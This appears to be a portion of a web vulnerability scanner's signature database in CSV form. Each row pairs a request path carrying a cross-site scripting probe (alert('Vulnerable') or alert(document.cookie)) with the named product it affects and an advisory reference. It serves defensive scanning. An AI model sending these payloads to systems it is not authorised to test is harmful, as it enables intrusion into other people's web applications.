"000729","0","4","/servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.","",""
"000730","0","4","/servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The NetDetector install is vulnerable to Cross Site Scripting (XSS) in its invalid login message. CA-2000-02.","",""
"000731","0","4","/<script>alert('Vulnerable')</script>.shtm","GET","<script>alert\('Vulnerable'\)<\/script>\.shtml","","","","","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000732","0","4","/<script>alert('Vulnerable')</script>.stm","GET","<script>alert\('Vulnerable'\)<\/script>\.shtml","","","","","Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000733","0","4","/admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","IIS 6 on Windows 2003 is vulnerable to Cross Site Scripting (XSS) in certain error messages. CA-2000-02.","",""
"000734","17665","4","/SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Site Server is vulnerable to Cross Site Scripting","",""
"000735","17666","4","/_mem_bin/formslogin.asp?\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Site Server is vulnerable to Cross Site Scripting","",""
"000736","0","4","/nosuchurl/><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","JEUS is vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html","",""
"000737","9216","4","/test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x","GET","<SCRIPT>alert\('Vulnerable'\)<\/SCRIPT>","","","","","OmniHTTPD's test.php is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000738","9217","4","/test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x","GET","<SCRIPT>alert\('Vulnerable'\)<\/SCRIPT>","","","","","OmniHTTPD's test.shtml is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000739","9218","4","@CGIDIRSredir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","OmniHTTPD's redir.exe is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000740","0","4","/search/results.stm?query=&lt;script&gt;alert('vulnerable');&lt;/script&gt;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Default Sambar file is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000741","3624","4","/webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000742","9234","4","@CGIDIRSYaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000743","0","4","@CGIDIRSvq/demos/respond.pl?<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. CA-2000-02.","",""
"000744","6458","4","@CGIDIRSviewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  CA-2000-02.","",""
"000745","6458","4","@CGIDIRSviewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  CA-2000-02.","",""
"000746","8391","4","@CGIDIRSurlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","urlcount.cgi on the Lil'HTTP server may be vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000747","0","4","@CGIDIRStest-cgi.exe?<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Default CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000748","0","4","@CGIDIRSstart.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Aestiva HTML/OS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000749","9230","4","@CGIDIRSsearch.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Upgrade to FDSE version 2.0.0.0055","",""
"000750","2322","4","@CGIDIRSsearch.php?searchstring=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. BID-8288.","",""
"000751","8392","4","@CGIDIRSpbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Lil'HTTP Server (Summit Computer Networks) CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000752","0","4","@CGIDIRSmyguestbook.cgi?action=view","GET","200","","","","","myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/.  CA-2000-02.","",""
"000753","4458","4","@CGIDIRSlogin.pl?course_id=\">&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","BlackBoard 5 from BlackBoard.com is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000754","7590","4","@CGIDIRShtsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","htdig is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000755","0","4","@CGIDIRSFormMail.cgi?<script>alert(\"Vulnerable\");</script>","GET","<script>alert\(\"Vulnerable\"\);<\/script>","","","","","FormMail.cgi allows Cross Site Scripting (XSS). CA-2000-02.","",""
"000756","8661","4","@CGIDIRSfom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) CA-2000-02. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html","",""
"000757","54110","4","@CGIDIRSfom.cgi?file=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Faq-O-Matic is vulnerable to Cross Site Scripting (XSS).  Upgrade to the latest from http://sourceforge.net/projects/faqomatic. CA-2000-02.","",""
"000758","0","4","@CGIDIRSerba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Aestiva HTML/OS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000759","21366","4","@CGIDIRSdiagnose.cgi","GET","200","","","","","This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000760","2748","4","@CGIDIRSdansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. CA-2000-02.","",""
"000761","651","4","@CGIDIRScgicso?query=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000762","5031","4","@CGIDIRSbetsie/parserl.pl/<script>alert('Vulnerable')</script>;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). CA-2000-02.","",""
"000763","21556","4","@CGIDIRSauction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Mewsoft Auction 3.0 from http://www.mewsoft.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000764","58958","4","@CGIDIRSathcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Authoria HR Suite is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000765","9283","4","@CGIDIRS.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000766","9283","4","@CGIDIRS.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>","GET","img src=javascript:alert\('Vulnerable'\)","","","","","Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000767","0","4","/~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02","",""
"000768","0","4","/~/<script>alert('Vulnerable')</script>.aspx","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02","",""
"000769","0","4","/~/<script>alert('Vulnerable')</script>.asp","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Cross site scripting (XSS) is allowed with .asp file requests (may be Microsoft .net). CA-2000-02","",""
"000770","58957","4","/z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825&","GET","<script>alert\(document\.cookie\)<\/script>","","","","","orum 2.4 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000771","0","4","/catinfo?<u><b>TESTING","GET","<u><b>TESTING","","","","","The Interscan Viruswall catinfo script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000772","0","4","/webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>","GET","alert\(\"Vulnerable\"\)<\/script>","","","","","PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000773","0","4","/webamil/test.php","GET","IMP: 3\.\(0\|1\|2\|2\\\.1\)","","","","","IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerabl to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2.","",""
"000774","59444","4","/users.php?mode=profile&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;","GET","<script>alert\(document\.cookie\)<\/script>","","","","","GeekLog 1.3.7 allows Cross Site Scripting (XSS). CA-2000-02.","",""
"000775","0","4","/usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","IcrediBB Bulletin Board System is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000776","0","4","/user.php?op=userinfo&uname=<script>alert('hi');</script>","GET","<script>alert\('hi'\);<\/script>","","","","","The PHP-Nuke installation is vulnerable to Cross Site Scripting (XSS). Update to versions above 5.3.1. CA-2000-02.","",""
"000777","0","4","/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com","GET","javascript:alert\(document\.cookie\)","","","","","Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000778","0","4","/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com","GET","<script>alert\(document\.cookie\)","","","","","Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000779","0","4","/TopSitesdirectory/help.php?sid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;","GET","<script>alert\(document\.cookie\)<\/script>","","","","","PHP TopSites allows Cross Site Scripting (XSS). CA-2000-02.","",""
"000780","41361","4","/templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>","GET","<script>javascript:alert\(document\.cookie\)","","","","","MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000781","41361","4","/templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)","","","","","MyMarket 1.71 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000782","9238","4","/supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000783","9238","4","/supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000784","9238","4","/supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","MyHelpdesk from http://myhelpdesk.sourceforge.net/ versions v20020509 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000785","0","4","/sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.","",""
"000786","20232","4","/submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This install of PHP-Nuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000787","27097","4","/ss000007.pl?PRODREF=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000788","59014","4","/showcat.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpLinkat is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000789","0","4","/shop/normal_html.cgi?file=&lt;script&gt;alert(\"Vulnerable\")&lt;/script&gt;","GET","<script>alert\(\"Vulnerable\"\)<\/script>","","","","","Happymail E-Commerce is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000790","5049","4","/setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","CiscoSecure ACS v3.0(1) Build 40 allows Cross Site Scripting (XSS). CA-2000-02.","",""
"000791","0","4","/servlet/custMsg?guestName=<script>alert(\"Vulnerable\")</script>","POST","<script>alert\(\"Vulnerable\"\)<\/script>","","","","","Bajie HTTP JServer is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000792","2689","4","/servlet/CookieExample?cookiename=<script>alert(\"Vulnerable\")</script>","POST","<script>alert\(\"Vulnerable\"\)<\/script>","","","","","Bajie HTTP JServer is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000793","2689","4","/servlet/ContentServer?pagename=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Open Market Inc. ContentServer is vulnerable to Cross Site Scripting (XSS) in the login-error page. CA-2000-02.","",""
"000794","0","4","/search/index.cfm?<script>alert(\"Vulnerable\")</script>","GET","<script>alert\(\"Vulnerable\"\)<\/script>","","","","","Search agent allows Cross Site Scripting (XSS). CA-2000-02.","",""
"000795","0","4","/search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","ezPublish 2.27 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000796","2669","4","/search.php?zoom_query=<script>alert(\"hello\")</script>","GET","<script>alert\(\"hello\"\)<\/script>","","","","","Wrensoft Zoom Search Engine is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000797","2322","4","/search.php?searchstring=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. BID-8288.","",""
"000798","50551","4","/search.php?searchfor=\"><script>alert(1776)</script>","GET","<script>alert\(1776\)<\/script>","","","","","Siteframe 2.2.4 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000799","0","4","/search.asp?term=<%00script>alert('Vulnerable')</script>","GET","alert\('Vulnerable'\)<\/script>","","","","","ASP.Net 1.1 may allow Cross Site Scripting (XSS) in error pages (only some browsers will render this). CA-2000-02.","",""
"000800","0","4","/script>alert('Vulnerable')</script>.cfm","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Macromedia's ColdFusion MX server is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Patch or upgrade to a newer version, or change the default 404 document. http://www.macromedia.com/v1/handlers/index.cfm?ID=23047","",""
"000801","0","4","/samples/search.dll?query=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","&logic=AND",""
"000802","0","4","/replymsg.php?send=1&destin=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This version of PHP-Nuke's replymsg.php is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000803","59443","4","/profiles.php?uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;","GET","<script>alert\(document\.cookie\)<\/script>","","","","","GeekLog 1.3.7 allows Cross Site Scripting (XSS). CA-2000-02.","",""
"000804","0","4","/postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft Utilities\"%3<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Postnuke Phoenix 0.7.2.3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000805","0","4","/postnuke/html/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PostNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000806","4599","4","/pm_buddy_list.asp?name=A&desc=B%22%3E<script>alert('Vulnerable')</script>%3Ca%20s=%22&code=1","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000807","0","4","/pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","WoltLab Burning Board is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000808","0","4","/pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","IcrediBB Bulletin Board System is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000809","0","4","/phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000810","0","4","/phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\"><script>alert('Vulnerable')</script>&MMN_position=[X:X]","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000811","0","4","/phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000812","0","4","/phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpWebSite 0.9.x and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000813","0","4","/phpwebchat/register.php?register=yes&username=OverG&email=<script>alert%20(\"Vulnerable\")</script>&email1=<script>alert%20(\"Vulnerable\")</script>","GET","alert\(\"Vulnerable\"\)<\/script>","","","","","PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000814","59093","4","/phptonuke.php?filnavn=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP-Nuke add-on PHPToNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000815","37511","4","/phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E","GET","<script>alert\(Vulnerable\)<\/script>","","","","","phpRank is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000816","32774","4","/phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).","",""
"000817","32774","4","/phpinfo.php3?VARIABLE=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).","",""
"000818","27071","4","/phpimageview.php?pic=javascript:alert(8754)","GET","alert\(8754\)","","","","","PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS).  CA-2000-02."," ",""
"000819","0","4","/phpclassifieds/latestwap.php?url=<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP Classifieds 6.05 from http://www.deltascripts.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000820","2193","4","/phpBB/viewtopic.php?topic_id=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","phpBB is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.","",""
"000821","4297","4","/phpBB/viewtopic.php?t=17071&highlight=\">\"<script>javascript:alert(document.cookie)</script>","GET","<script>javascript:alert\(document\.cookie\)<\/script>","","","","","phpBB is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000822","11145","4","/phorum/admin/header.php?GLOBALS[message]=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000823","11144","4","/phorum/admin/footer.php?GLOBALS[message]=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000824","0","4","/pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Pforum 1.14 is vulnerable to Cross Site Scripting (XSS). CA-2000-02","",""
"000825","0","4","/pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Aestiva HTML/OS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000826","0","4","/Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Vignette server is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Upgrade to the latest version.","",""
"000827","2767","4","/openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>","GET","200","","","","","OpenAutoClassifieds 1.0 is vulnerable to a XSS attack","",""
"000828","2767","4","/openautoclassifieds/friendmail.php?listing=&lt;script&gt;alert(document.domain);&lt;/script&gt;","GET","<script>alert\(document\.domain\)<\/script>","","","","","OpenAutoClassifieds 1.x is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000829","0","4","/node/view/666\"><script>alert(document.domain)</script>","GET","<script>alert\(document\.domain\)<\/script>","","","","","Drupal 4.2.0 RC is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000830","5106","4","/netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000831","0","4","/nav/cList.php?root=</script><script>alert('Vulnerable')/<script>","GET","<script>alert\('Vulnerable'\)\/<script>","","","","","RaQ3 server script is vulnerable to Cross Site Scripting (XSS).  CA-2000-02.","",""
"000832","3931","4","/myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=","GET","\[script\]alert\('Vulnerable\)","","","","","myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000833","3931","4","/myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=","GET","<script>alert\('Vulnerable\)","","","","","myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000834","3931","4","/myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent","GET","\[script\]alert\(document\.cookie\)","","","","","myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000835","3931","4","/myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent","GET","<script>alert\(document\.cookie\)","","","","","myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000836","0","4","/myhome.php?action=messages&box=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","OpenBB 1.0.0 RC3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000837","0","4","/msadm/user/login.php3?account_name=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The Sendmail Server Site User login is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000838","0","4","/msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The Sendmail Server Site Administrator Login is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000839","0","4","/msadm/domain/index.php3?account_name=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The Sendmail Server Site Domain Administrator login is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000840","50539","4","/modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>","GET","<script>alert\(document\.cookie\)","","","","","Basit cms 1.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000841","0","4","/modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000842","0","4","/modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
"000843","0","4","/modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""
